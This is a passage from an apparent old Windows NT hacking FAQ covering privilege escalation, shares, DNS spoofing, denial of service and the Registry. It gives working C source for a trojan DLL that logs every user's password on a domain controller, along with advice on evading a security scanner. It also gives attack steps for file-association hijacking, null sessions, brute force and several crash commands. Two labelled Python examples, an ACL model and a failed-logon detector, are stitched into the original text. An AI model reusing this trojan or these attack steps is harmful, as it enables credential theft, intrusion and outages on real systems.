In a share you have read/write access to, upload it. Now change the association between .txt files and notepad to point to the location of the uploaded file, like \\ThisWorkstation\RWShare\badboy.exe. Now wait for the administrator to launch a text file by double clicking on it, and the password becomes "biteme". Of course, if the Sys Admin is smart they will have removed write permission from Everyone for HKEY_CLASSES_ROOT, only giving out full access to creator\owner.

If the system is 4.0, see section 04-5 regarding the use of GetAdmin.exe.

---------------------------------------------------------------------------

05-3. What about %systemroot%\system32 being writeable?

Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison (jra@cygnus.com) and call the resulting file FPNWCLNT.DLL. Now wait for the user names and passwords to get written to a file in \temp.
------------- cut --------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct UNI_STRING {
    USHORT len;
    USHORT maxlen;
    WCHAR *buff;
};

static HANDLE fh;

/* Called by the LSA when the notification DLL is loaded. */
BOOLEAN __stdcall InitializeChangeNotify()
{
    DWORD wrote;
    fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE,
                    FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
                    FILE_ATTRIBUTE_NORMAL | FILE_FLAG_WRITE_THROUGH, 0);
    WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
    return TRUE;
}

/* Called by the LSA after each password change; this trojan logs what it is handed. */
LONG __stdcall PasswordChangeNotify(struct UNI_STRING *user, ULONG rid,
                                    struct UNI_STRING *passwd)
{
    DWORD wrote;
    WCHAR wbuf[200];
    char buf[512];
    char buf1[200];
    DWORD len;

    memcpy(wbuf, user->buff, user->len);
    len = user->len / sizeof(WCHAR);
    wbuf[len] = 0;
    wcstombs(buf1, wbuf, 199);
    sprintf(buf, "User = %s : ", buf1);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);

    memcpy(wbuf, passwd->buff, passwd->len);
    len = passwd->len / sizeof(WCHAR);
    wbuf[len] = 0;
    wcstombs(buf1, wbuf, 199);
    sprintf(buf, "Password = %s : ", buf1);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);

    sprintf(buf, "RID = %x\n", rid);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);
    return 0L;
}
------------- cut --------------

If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systemroot%\system32. ISS (www.iss.net) has a security scanner for NT which will detect the trojan DLL, so you may wish to consider adding in extra junk to the above code to make the size of the compiled DLL match what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the trojan.

It should be noted that by default the group Everyone has default permissions of "Change" in %systemroot%\system32, so any DLL that is not in use by the system could be replaced with a trojan DLL that does something else.

---------------------------------------------------------------------------

05-4. What if the permissions are restricted on the server?
By default the NT administrator account does not have a lockout feature like normal user accounts, to prevent a denial-of-service attack on the administrator account. Since failed logins are not logged by default, you could possibly gain administrator access by sheer brute force. If the Sys Admin runs passprop.exe they can turn on the lockout feature of Administrator.

---------------------------------------------------------------------------

05-5. What exactly does the NetBios Auditing Tool do?

Developed by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the complete source code. It is the "SATAN" of NetBios based systems. Here is a quote from Secure Networks Inc about the product -

"The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services offered by the target system. It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client. The major steps are as follows:

A UDP status query is sent to the target, which usually elicits a reply containing the Netbios "computer name". This is needed to establish a session. The reply also can contain other information such as the workgroup and account names of the machine's users. This part of the program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent back to UDP port 137 even if the original query came from some different port.

TCP connections are made to the target's Netbios port [139], and session requests using the derived computer name are sent across. Various guesses at the computer name are also used, in case the status query failed or returned incomplete information. If all such attempts to establish a session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was reachable.

Provided a connection is established, Netbios "protocol levels" are now negotiated across the new connection.
This establishes various modes and capabilities the client and server can use with each other, such as password encryption and whether the server uses user-level or share-level Security. The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that protocol is somewhat simpler and uses a smaller password keyspace than NT.

If the server requires further session setup to establish credentials, various defaults are attempted. Completely blank usernames and passwords are often allowed to set up "guest" connections to a server; if this fails then guesses are tried using fairly standard account names such as ADMINISTRATOR, and some of the names returned from the status query. Extensive username/password checking is NOT done at this point, since the aim is just to get the session established, but it should be noted that if this phase is reached at all MANY more guesses can be attempted and likely without the owner of the target being immediately aware of it.

Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers.

Attempts are then made to connect to all listed file system shares and some potentially unlisted ones. If the server requires passwords for the shares, defaults are attempted as described above for session setup. Any successful connections are then explored for writeability and some well-known file-naming problems [the ".." class of bugs].

If a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable" with the remaining question being to what extent. Information is collected under the appropriate vulnerability at most of these steps, since any point along the way may be blocked by the Security configurations of the target. Most Microsoft-OS based servers and Unix SAMBA will yield computer names and share lists, but not allow actual file-sharing connections without a valid username and/or password.
A remote connection to a share is therefore a possibly serious Security problem, and a connection that allows WRITING to the share almost certainly so. Printer and other "device" services offered by the server are currently ignored."

If you need more info on NAT, try looking at this web location: http://www.secnet.com/ntinfo/ntaudit.html

---------------------------------------------------------------------------

05-6. What is the "Red Button" bug?

MWC has released an exploit that allows the following to occur -- the registry of a remote machine can be accessed, and a list of users AND of shares can be obtained, even if the intruder hasn't logged in. There is a built-in user called "anonymous" that is usually used for communication between machines. This exploit takes advantage of the fact that anonymous is a member of the group Everyone. Because of this, the following can be done:

- Any share that can be accessed by Everyone is vulnerable.
- System and application logs can be read.
- Any NT machine with NetBios bound to the network can have its registry read or written to if Everyone has that access.
- Using Lan Manager calls can give a list of all users, the Administrator (if renamed), and a list of all shares.

Using this access a trojan could be loaded, since often the group Everyone has access to application software (see sections 05-2 and 05-3 for ideas here).

It is possible that a Sys Admin could have unbound NetBios from the interface. This would disallow some access. Typically at a security aware site you would find the machines outside the firewall, like the Web server or FTP server, configured this way (and all other access blocked by the firewall). However, if you compromise the machine this could be a handy partial backdoor -- especially if you are using one machine as a "drop" during an attack. If all the users are moved from the Everyone group, you are also dead in the water. For you admins out there, ISS has released a tool to automate this process.
And admins, you should check and see what shares Everyone can get to.

The bug can be done manually -- no exploit code needed. Try this from a 4.00 workstation:

net use \\targetserver\ipc$ "" /user:""

Now run User Manager, Event Viewer, Registry Editor, or simply use the net command to target the remote machine. The administrator account's SID always ends in -500 (Guest is -501), so find that and you have the administrator account, even if renamed. The built-in local groups (documented and undocumented) always have the same SID, so check out your own machine first and compare -- especially if some of these have been renamed.

MWC's web site is http://www.ntsecurity.com, and the exploit code can be found there. ISS's tool can be found at ftp://ftp.iss.net/everyone2users.exe.

---------------------------------------------------------------------------

05-7. What about forging DNS packets for subversive purposes?

Sure. ;-) By forging UDP packets, NT name server caches can be compromised. If recursion is allowed on the name server, you can do some nasty things. Recursion is when a server receives a name server lookup request for a zone or domain which it does not serve. This is typically how most DNS setups are done.

So how do we do it? We will use the following example: We are root on ns.nmrc.org, IP 10.10.10.1. We have pirate.nmrc.org with an address of 10.10.10.2, and bait.nmrc.org with an address of 10.10.10.3. Our mission? Make the users at lame.com access pirate.nmrc.org when they try to access www.lamer.net. Okay, assume automation is at work here to make the attack smoother...

- DNS query is sent to ns.lame.com asking for the address of bait.nmrc.org.
- ns.lame.com asks ns.nmrc.org what the address is.
- The request is sniffed, and the query ID number is obtained from the request packet.
- DNS query is sent to ns.lame.com asking for the address of www.lamer.net.
- Since we know the previous query ID number, chances are the next query ID number will be close to that number.
- We send spoofed DNS replies with several different query ID numbers. These replies are spoofed to appear to come from ns.lamer.net, and state that its address is 10.10.10.2.
- pirate.nmrc.org is set up to look like www.lamer.net, except maybe it has a notice to "go to the new password page and set up an account and ID". Odds are this new password is used by that lame.com user somewhere else...

With a little creativity, you can also do other exciting things like reroute (and make copies of) email, denial of service (tell lame.com that www.lamer.net doesn't exist anymore), and other fun things. Supposedly Service Pack 3 fixes this.

---------------------------------------------------------------------------

05-8. What about shares?

The main thing to realize about shares is that there are a few that are invisible. Administrative shares are default shares that cannot be removed. They have a $ at the end of their name. For example, C$ is the administrative share for the C: partition, D$ is the administrative share for the D: partition. WINNT$ is the root directory of the system files.

By default, since logging is not enabled on failed attempts and the administrator doesn't get locked out from false attempts, you can try and try different passwords for the administrator account. You could also try a dictionary attack. Once in, you can get at basically anything.

---------------------------------------------------------------------------

05-9. How do I get around a packet filter-based firewall?

If the target NT box is behind a firewall that is doing packet filtering (which is not considered firewalling by many folks) and it does not have SP3 loaded, it is possible to send it packets anyway. This involves sending decoy IP packet fragments with specially crafted headers that will be "reused" by the malicious IP packet fragments.
This is due to a problem with the way NT's TCP/IP stack handles reassembling fragmented packets. As odd as this sounds, example code exists to prove it works. See the web page at http://www.dataprotect.com/ntfrag for details.

How does it bypass the packet filter? Typically packet filtering only drops the fragmented packet with the offset of zero in the header. The example source forges the headers to get around this, and NT happily reassembles what does arrive.

---------------------------------------------------------------------------

Section 06 File and Directory Access

---------------------------------------------------------------------------

06-1. How is file and directory security enforced?

Since files and directories are considered objects (same as services), the security is managed at an "object" level. An access-control list (ACL) contains information that controls access to an object or controls auditing of attempts to access an object. It begins with a header that contains information pertaining to the entire ACL, including the revision level, the size of the ACL, and the number of access-control entries (ACEs) in the list. After the header is a list of ACEs. Each ACE specifies a trustee, a set of access rights, and flags that dictate whether the access rights are allowed, denied, or audited for the trustee. A trustee can be a user account, group account, or a logon account for a service program.

A security descriptor can contain two types of ACLs: a discretionary ACL (DACL) and a system ACL (SACL). In a DACL, each ACE specifies the types of access that are allowed or denied for a specified trustee. An object's owner controls the information in the object's DACL. For example, the owner of a file can use a DACL to control which users can have access to the file, and which users are denied access. If the security descriptor for an object does not have a DACL, the object is not protected and the system allows all attempts to access the object.
However, if an object has a DACL that contains no ACEs, the DACL does not grant any access rights. In this case, the system denies all attempts to access the object.

In a SACL, each ACE specifies the types of access attempts by a specified trustee that cause the system to generate audit records in the system event log. A system administrator controls the information in the object's SACL. An ACE in a SACL can generate audit records when an access attempt fails, when it succeeds, or both.

To keep track of the individual object, a Security Identifier (SID) uniquely identifies a user or a group. A SID contains:

- User and group security descriptors
- 48-bit ID authority
- Revision level
- Variable subauthority values

A privilege is used to control access to a service or object more strictly than is normal with discretionary access control. Privileges provide access to services rarely needed by most users. For example, one type of privilege might give access for backups and restores, another might allow the system time to be changed.

---------------------------------------------------------------------------

06-2. What is NTFS?

NTFS is the Windows NT special file system. This file system is tightly integrated into Windows security -- it is what allows access levels to be set from the directory down to individual files within a directory.

---------------------------------------------------------------------------

06-3. Are there any vulnerabilities to NTFS and access controls?

Not so much vulnerabilities as there are quirks -- quirks that can be exploited to a certain degree. For example, let's say the system admin has built a home directory for you on the server, but has disallowed the construction of directories or files that you wish to make available to the group Everyone. You want to make this special directory so that you can easily retrieve some hack tools, but you are cut off.
However, if the sys admin left you as the owner of the home directory, you can go in and alter its permissions. This is because as long as you are the owner or Administrator you still control the file. Oh sure, you may get a few complaints from the system when you are doing it, but it can be done.

Since NTFS has security integrated into it, there are not too many ways around it. The main one requires access to the physical system. Boot up the system on a DOS diskette, and use NTFSDOS.EXE. It will allow you to access an NTFS volume, bypassing security.

The last quirk is that if you have a directory with Full Control instead of RWXDPO permissions, then you get a hidden permission called File Delete Child. FDC cannot be removed. This means that all members of the group Everyone can delete any read-only file in the directory. Depending on what the directory contains, a hacker can replace a file with a trojan.

---------------------------------------------------------------------------

06-4. What is Samba and why is it important?

Samba is a freeware app developed by Andy Tridgell. It is a great tool for helping integrate Unix into Microsoft Windows and Lan Manager environments. The main idea is that you can, with Samba, allow a Unix machine to access files and directories. The other handy thing about Samba is that, like most Unix freeware, you get the source code.

Most hackers seem to have Linux up and running, so loading up Samba gives you several tactical advantages. A number of the exploits described here require access to a privileged port (< 1024). If you are root on your own Linux box, you can start exploits from those needed ports. A lot of the tests in the NMRC lab were conducted using Samba. In fact, when World Star Holdings Ltd in Canada had their lame Cybertest '96 contest on June 12th, yours truly used Samba to break in (but I wasn't first).
Samba talks SMB and can directly access Windows NT hardware, and Hobbit (hobbit@avian.org) has put together a very interesting paper entitled "CIFS: Common Insecurities Fail Scrutiny". It is highly recommended reading for admins and hackers alike. Included in the paper are details and source patches to allow easier attacks on NT. Studying the source code of Samba taught me a lot, but Hobbit's paper puts everything in a whole new light. It provides some well documented basics on how a lot of the communications work, detailing exactly WHY certain protocols and behaviours are vulnerable to abuse. Get Samba and read its documentation. Read Hobbit's paper and apply the patches. Period.

---------------------------------------------------------------------------

06-5. I hack remotely. Once in, how can I do all that GUI stuff?

The main problem is adjusting NT file security attributes. Some utilities are available with NT that can be used, but I'd recommend using the NT Command Line Security Utilities. They include:

saveacl.exe  - saves file, directory and ownership permissions to a file
restacl.exe  - restores file permissions and ownership from a saveacl file
listacl.exe  - lists file permissions in human readable format
swapacl.exe  - swaps permissions from one user or group to another
grant.exe    - grants permissions to users/groups on files
revoke.exe   - revokes permissions to users/groups on files
igrant.exe   - grants permissions to users/groups on directories
irevoke.exe  - revokes permissions to users/groups on directories
setowner.exe - sets the ownership of files and directories
nu.exe       - 'net use' replacement, shows the drives you're connected to

The latest version can be found at ftp://ftp.netcom.com/pub/wo/woodardk/.
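The DACL and SACL rules laid out in 06-1 (no DACL means everything is allowed, an empty DACL means everything is denied, and otherwise ACEs are walked in order) are easiest to see in a small working model. The following Python is an added example, not Windows code and not from the FAQ; the access-mask bits, object owner and sample descriptor are constructed, while S-1-1-0, S-1-5-32-544 and S-1-5-32-546 are the real well-known SIDs for Everyone, Administrators and Guests.

```python
"""Access-check model for NT-style DACLs and SACLs (added example for 06-1).

This is not Windows code; it is a small Python model of the rules 06-1
describes: a missing DACL allows everything, an empty DACL denies
everything, and otherwise ACEs are evaluated in list order against the
SIDs in the caller's token. The access-mask bits, the owner SID and the
sample descriptor below are constructed for the example.
"""
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed access-mask bits (the real NT masks differ).
READ, WRITE, EXECUTE, DELETE = 1, 2, 4, 8

# Well-known SIDs used as trustees: Everyone, Administrators, Guests.
EVERYONE = "S-1-1-0"
ADMINISTRATORS = "S-1-5-32-544"
GUESTS = "S-1-5-32-546"


@dataclass
class Ace:
    kind: str                  # "allow" or "deny" in a DACL, "audit" in a SACL
    trustee: str               # SID the entry applies to
    mask: int                  # access rights the entry covers
    on_success: bool = False   # SACL only: audit granted accesses
    on_failure: bool = False   # SACL only: audit refused accesses


@dataclass
class SecurityDescriptor:
    owner: str
    dacl: Optional[List[Ace]] = None      # None = no DACL at all (unprotected)
    sacl: List[Ace] = field(default_factory=list)


def access_check(sd, token_sids, desired):
    """Return True when every bit of `desired` is granted to the token."""
    if sd.dacl is None:            # no DACL: object is unprotected
        return True
    remaining = desired
    for ace in sd.dacl:            # an empty DACL never grants anything
        if ace.trustee not in token_sids:
            continue
        if ace.kind == "deny" and ace.mask & remaining:
            return False           # a matching deny ends the check
        if ace.kind == "allow":
            remaining &= ~ace.mask
            if remaining == 0:
                return True
    return remaining == 0


def audit_records(sd, token_sids, desired, granted):
    """Audit entries the SACL would generate for this access attempt."""
    records = []
    for ace in sd.sacl:
        if ace.kind != "audit" or ace.trustee not in token_sids:
            continue
        if not (ace.mask & desired):
            continue
        if granted and ace.on_success:
            records.append(("SUCCESS", ace.trustee, desired))
        if not granted and ace.on_failure:
            records.append(("FAILURE", ace.trustee, desired))
    return records


def check_and_audit(sd, token_sids, desired):
    """Combine the DACL decision with the SACL audit output."""
    granted = access_check(sd, token_sids, desired)
    return granted, audit_records(sd, token_sids, desired, granted)


# Constructed sample descriptor: Everyone may read, Guests are explicitly
# denied writing ahead of a broad allow, and failed write or delete
# attempts by anyone are audited.
SAMPLE_SD = SecurityDescriptor(
    owner="S-1-5-21-1000-2000-3000-500",   # constructed Administrator SID
    dacl=[
        Ace("allow", EVERYONE, READ),
        Ace("deny", GUESTS, WRITE | DELETE),
        Ace("allow", EVERYONE, WRITE | DELETE),
        Ace("allow", ADMINISTRATORS, READ | WRITE | EXECUTE | DELETE),
    ],
    sacl=[Ace("audit", EVERYONE, WRITE | DELETE, on_failure=True)],
)
```

The order of the ACEs matters: the deny for Guests only takes effect because it sits before the allow for Everyone, which is why the 06-3 trick of an owner rewriting permissions on a directory can quietly undo a restriction an admin thought was in place.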
---------------------------------------------------------------------------
---------------------------------------------------------------------------

Section 07 Miscellaneous Info on NT

---------------------------------------------------------------------------

07-1. How do I bypass the screen saver?

If a user has locked their local workstation using CTRL+ALT+DEL, and you can log in as an administrator, you will have a window of a few seconds where you will see the user's desktop, and can even manipulate things. This trick works on NT 3.5 and 3.51, unless the latest service pack has been loaded.

If the service pack has been loaded, but it's still 3.X, try the following.

- From another NT workstation, type the following command: shutdown \\ /t:30
- This will start a 30 second shutdown on the target and a Security window will pop up.
- Cancel the shutdown with the following command: shutdown \\ /a
- The screen saver will kick back in.
- Wiggle the mouse on the target. The screen will go blank.
- Now do a ctrl-alt-del on the target.
- An NT Security window will appear. Select cancel.
- You are now at the Program Manager.

---------------------------------------------------------------------------

07-2. What can sniffing get me?

If an older version of LANMAN is being used, passwords are sent plaintext (see section 10-02 for details). However, more common are shares that are passworded. Accessing these shares sends passwords in the clear. Any traditional protocols (FTP and telnet for example) that send passwords in the clear could be sniffed, and it is quite possible that a user's FTP password is the same as their regular NT account password.

---------------------------------------------------------------------------

07-3. How can I detect that a machine is in fact NT on the network?

Hopefully it is a web server, and they've simply stated proudly "we're running NT", but don't expect that... Port scanning will find some. Typically you'll see port 135 open.
This is no guarantee it's not Windows 95, however. Using Samba you should be able to connect and query for the existence of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check \CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first, as Everyone has read permissions here by default.

Port 137 is used for running NetBios over IP, and since in the Windows world NetBios is used, certainly you can expect port 137 to be open if IP is anywhere in use around NT. Another possible indication is checking for port 139. This tells you your target is advertising an SMB resource to share info, but it could be any number of things, such as a Windows 95 machine or even Windows for Workgroups. These may not be entirely out of the question as potential targets, but if you are after NT you will have to use a combination of the aforementioned techniques coupled with some common sense.

To simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on remote systems. It is discussed in more detail in section 05-5.

---------------------------------------------------------------------------

07-4. Can I do on-the-fly disk encryption on NT?

Try Shade. It allows you to create an encrypted disk device inside a file. This "device" can then be formatted using either NTFS or FAT and used as a regular disk. Shade encrypts on every write operation and decrypts on every read operation to this new device. Look for Shade at: http://softwinter.bitbucket.co.il/shade.html

---------------------------------------------------------------------------

07-5. Does the FTP service allow passive connections?

I was playing around in the registry, looking for odd things, and found this strange entry under : If set to 1, you can do passive connections depending on the TCP port you use.
A passive connection is where you can connect to FTP site alice.com, and from there connect to site bob.com. It is used by hackers because any odd connections at bob.com will appear in logs as coming from alice.com. Most typical is a port scan. A port scanner for doing this from a Unix box can be found at: http://www.nmrc.org/files/unix/ftp-scan.c

---------------------------------------------------------------------------

07-6. What is this "port scanning" you are talking about?

Port scanning is a technique to check TCP/IP ports to see what services are available. For example, port 80 is typically a web server, port 25 is SMTP used by Internet mail, and so on. By scanning and seeing what TCP/IP ports are listening at the end of a TCP/IP address, you can get an idea as to what type of box the target might be, what services are available, and possibly plan an attack if you are aware of an exploit involving a particular service. If ports 135, 137, 138, and 139 are open on the target of a scan, it is quite possible that the target is NT (although it could be Win95 or even WFW 3.11, see section 07-3 above). Port scanners are widely available for a variety of different platforms. Check section 10-5 for the location of several.

---------------------------------------------------------------------------

07-7. Does NT have bugs like Unix' sendmail?

If the server is running a POP3 server like Exchange, you can use a brute force technique to guess passwords. Odds are that the sys admin is not logging or looking at logs for this stuff. In particular, if you are dealing with a sys admin that isn't used to the wild and woolly Unix world, it may not even occur to the admin to look. This is something that NT folks are just now having to face, whereas their Unix admin counterparts have had to maintain this level of scrutiny for a while.
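Sections 05-4, 05-8 and 07-7 all rest on the same gap: failed logons against Administrator or a POP3 account are not logged or not looked at. What the admin's side of that looks like is a small sliding-window count of failures per source and per account. The Python below is an added example, not a tool from the FAQ; the log format, hosts, account names, thresholds and the sample lines are all constructed.

```python
"""Failed-logon burst detector over a small constructed log (added example
for 05-4, 05-8 and 07-7). Not a tool from the FAQ: a plain Python sketch
of the check an admin can run once failures are being logged at all.
The log format, hosts, account names and thresholds are all constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"src=(?P<src>\S+) user=(?P<user>\S+) svc=(?P<svc>\S+) result=(?P<result>\S+)$"
)

# Constructed sample: a POP3 guessing run against Administrator (note the
# varying case), one ordinary failed SMB logon, and a late straggler that
# falls outside the window.
SAMPLE_LOG = """\
1997-10-25 02:11:03 src=10.0.0.7 user=Administrator svc=pop3 result=FAIL
1997-10-25 02:11:05 src=10.0.0.7 user=Administrator svc=pop3 result=FAIL
1997-10-25 02:11:08 src=10.0.0.7 user=administrator svc=pop3 result=FAIL
1997-10-25 02:11:10 src=10.0.0.9 user=bob svc=smb result=FAIL
1997-10-25 02:11:12 src=10.0.0.7 user=administrator svc=pop3 result=FAIL
1997-10-25 02:11:15 src=10.0.0.7 user=ADMINISTRATOR svc=pop3 result=FAIL
1997-10-25 02:11:20 src=10.0.0.9 user=bob svc=smb result=OK
1997-10-25 02:15:00 src=10.0.0.7 user=administrator svc=pop3 result=FAIL
""".splitlines()


def parse_line(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec


def detect_bursts(lines, threshold=5, window_seconds=60):
    """Flag any source or account with >= threshold failures inside the window.

    Two keys are tracked so that both a single noisy source and an account
    being guessed from many sources are caught. Returns a list of dicts,
    one per key, recorded the first time that key crosses the threshold.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)      # key -> timestamps of recent failures
    alerts = {}
    for rec in filter(None, map(parse_line, lines)):
        if rec["result"] != "FAIL":
            continue
        for key in (("src", rec["src"]), ("user", rec["user"].lower())):
            q = recent[key]
            q.append(rec["ts"])
            while rec["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold and key not in alerts:
                alerts[key] = {"kind": key[0], "value": key[1],
                               "count": len(q), "first": q[0], "last": q[-1]}
    return [alerts[k] for k in sorted(alerts)]


if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_LOG):
        print("%(kind)s %(value)s: %(count)d failures between %(first)s and %(last)s" % alert)
```

Account names are folded to lower case before counting, since NT logons are case-insensitive and a guessing tool is free to vary the case; the per-account key is what catches the 05-8 case where Administrator is tried from more than one source.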
---------------------------------------------------------------------------

Section 08 Denial of Service

---------------------------------------------------------------------------

08-1. What is "Denial of Service"?

Denial of Service (DOS) is simply rendering a service offered by a workstation or server unavailable to others. This is a controversial subject, since some people think that DOS is not a hack, or rather juvenile and petty. While I can't think of very many reasons why you might want to engage in DOS, I still will continue to include this type of material in Hack FAQs. What is more sad -- the fact that I include them, or the fact that there are so many of them?

Reasons that a hacker might want to resort to DOS might include the following:

- A trojan has been installed, but a reboot is required to activate it.
- A hacker wishes to cover their tracks VERY DRAMATICALLY, or cover CPU activity with a random crash to make the site think it was "just a fluke".
- The hacker isn't a hacker at all, but a pissed off lamer who has a poor outlook and too much free time.
- The hacker is acting out of the need (or delusion) that the DOS serves a greater good, such as a DOS attack on Pro Life sites by Pro Choice believers.

Reasons that a Sys Admin might use DOS:

- A Sys Admin may want to ensure that their site is NOT vulnerable by testing out the latest patch.
- A Sys Admin has a runaway process on a server causing problems and cannot physically access the box (I did this once).
- The Sys Admin isn't a Sys Admin at all, but a pissed off lamer who has a poor outlook and too much free time.

---------------------------------------------------------------------------

08-2. What is the Ping of Death?

The Ping of Death is a large ICMP packet sent by a workstation to a target. The target receives the ping in fragments and starts reassembling the packet. However, due to the size of the packet, once it is reassembled it is too big for the buffer and overflows it.
This causes unpredictable results, such as reboots or hangs. Windows 95 and Windows NT are capable of sending such a packet: the ping command's -l switch sets the data size, so a command of the form

ping -l 65527 -s 1 <target>

sends a datagram that exceeds 65535 bytes once the IP and ICMP headers are added. There are also source code examples available for Unix platforms that allow large ping packets to be constructed. These sources are freely available on the Internet.

Only NT 3.51 WITHOUT the latest service pack is vulnerable. NT 4.0 does not seem to suffer from the Ping of Death.

---------------------------------------------------------------------------
08-3. What is a SYN Flood attack?

In TCP, a three-way handshake takes place as a client connects to a service. First the client sends a SYN packet, to which the service responds with a SYN-ACK. Finally the client acknowledges the SYN-ACK with an ACK and the conversation is considered started. A SYN flood is when the client never answers the SYN-ACK, leaving a half-open connection that ties up an entry in the service's connection queue until it times out, and meanwhile keeps sending new SYN packets. The source address of the SYNs is forged to a non-existent (or at least unreachable) host. It must not be a live host: a live host that received an unexpected SYN-ACK would answer with a RST and free the entry. As long as SYN packets arrive faster than the half-open entries time out, the queue stays full and no legitimate connection gets in. This is a simplified version of what exactly happens. For more elaborate details and sample Linux code for creating a flood, see Phrack 48 file 13 by daemon9.

Windows NT 3.51 is vulnerable unless new versions of the TCP/IP drivers have been loaded. Version 4.0 requires the latest service pack.

---------------------------------------------------------------------------
08-4. What can telnet give me in the way of denial of service?

There are several DoS attacks involving a simple telnet client that can be used against an NT server. First, telnetting to port 53, 135, or 1031, typing in about 10 or so characters and hitting enter will cause problems. If DNS (port 53) is running, DNS will stop.
If 135 answers, CPU utilization will climb to 100%, slowing performance. And if port 1031 is hit, IIS will get knocked down. Typically the fix is to reboot the server, as it will be hung or so slow as to be useless. Telnetting to port 80 and typing "GET ../.." will also crash IIS. If the latest service pack is loaded these attacks will not work.

---------------------------------------------------------------------------
08-5. What can I do with Samba?

Don't get me started ;-) As far as DoS goes, if you connect with Samba to a 3.x NT server that does not have the latest service pack loaded, you can send it "DIR ..\" and crash it. For a little bit on Samba, see section 06-4.

---------------------------------------------------------------------------
08-6. How do I lock out others from files?

Consider a variation of this source being added to a virus-like program:

/* lock.c written by Paul Ashton */
#include <windows.h>
#include <stdlib.h>

int main(int ac, char *av[])
{
    HANDLE fp;

    if (ac < 2)
        return 1;

    /* A share mode of 0 means no other process may open the file for
     * reading, writing or deleting while this handle stays open. */
    fp = CreateFile(av[1], FILE_READ_DATA, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (fp == INVALID_HANDLE_VALUE)
        exit(GetLastError());

    Sleep(60000);            /* hold the exclusive handle for 60 seconds */
    CloseHandle(fp);
    return 0;
}

Passing a file name to the above program opens it with a share mode of zero, which denies every other process read, write and delete access until the handle is closed, so the file is locked for 60 seconds. Two caveats: the caller needs at least read access to the file, and an exclusive open only succeeds if nobody else already has the file open, so a log file that a service holds open continuously cannot be grabbed this way. Imagine an intruder locking various components of a logging facility from a limited use account to attack the Administrator...

---------------------------------------------------------------------------
08-7. What's with ROLLBACK.EXE?

If the file ROLLBACK.EXE is executed, the registry can be wiped. You must re-install or do a complete restore if this happens to you. Sys Admins will probably want to remove this file. Renamed, it makes for one hell of a nasty trojan.

It is reportedly possible to lock onto a port, say port 19, so that when the server crashes and comes back up ROLLBACK.EXE will start trying to unlock the port and in doing so open up the registry for anyone to wipe it.
I was unsuccessful in getting this to happen in the lab, but probably because I find DoS attacks rather lame I didn't try very hard to get it to work. But others claim it can happen, so keep it in mind.

---------------------------------------------------------------------------
08-8. What is an OOB attack?

This attack is fairly simple, and a fair amount of source code is available. Basically it involves sending TCP out-of-band (urgent) data to a Windows machine, typically to port 139 (the NetBIOS session service); the receiving TCP stack mishandles the urgent data and the box either blue screens or loses its network connection. This was patched with SP3 and a Hot Fix, but apparently with a little monkeying around with the code you can get around this. This DoS is very popular, mainly because it has been written for such a wide variety of socket implementations: I've seen Unix and Windows NT versions of the code, an implementation in Perl, and even an implementation using the Rexx socket APIs on OS/2. If you are so inclined, try a web search for "winnuke", which will get you probably a thousand locations with the code.

---------------------------------------------------------------------------
08-9. Are there any other denial of service attacks?

If a domain user logs onto the console, creates a file and removes its permissions, it is possible for another user to log onto the console and delete the file. Microsoft is working on a patch. The problem affects all versions of NT. However, this isn't what I'd consider "denial of service", as it is more like denial of a file. Depending on the file, though, it could be used as a DoS. See the last paragraph of section 06-3 for details.

If you are running smbmount on version 2.0.25 of Linux, you can crash an NT server. smbmount is intended to be run on Linux 2.0.28 or higher, so it doesn't work right on 2.0.25. You also need a legit user account. Running as root, type smbmount //target/service /mnt -U client_name, followed by ls /mnt. This will hang the shell on Linux (no biggie) and blue screen the target server (biggie).

The final DoS I'm aware of involves Microsoft's DNS on NT 4.0 server.
If you send it a DNS response when it did not make a query, DNS will crash. The latest service pack fixes this problem.

---------------------------------------------------------------------------
Section 09 The Registry
---------------------------------------------------------------------------

09-1. What is the Registry?

The Registry is the central configuration database for Windows NT. Each NT workstation or server has its own Registry, and each one contains info on the hardware and software of the computer it resides on. For example, comm port definitions, Ethernet card settings, desktop settings and profiles, and what a particular user can and cannot do are stored in the Registry. Remember those ugly system INI files in Windows 3.1? Well, they are all rolled, along with even more fun stuff, into one big database called the Registry in NT.

Of interest to hackers is the fact that all access control and assorted security parameters are located in the Registry. While I'm tempted to discuss just that portion of the Registry, I'll briefly cover everything for completeness but put the fun stuff up front.

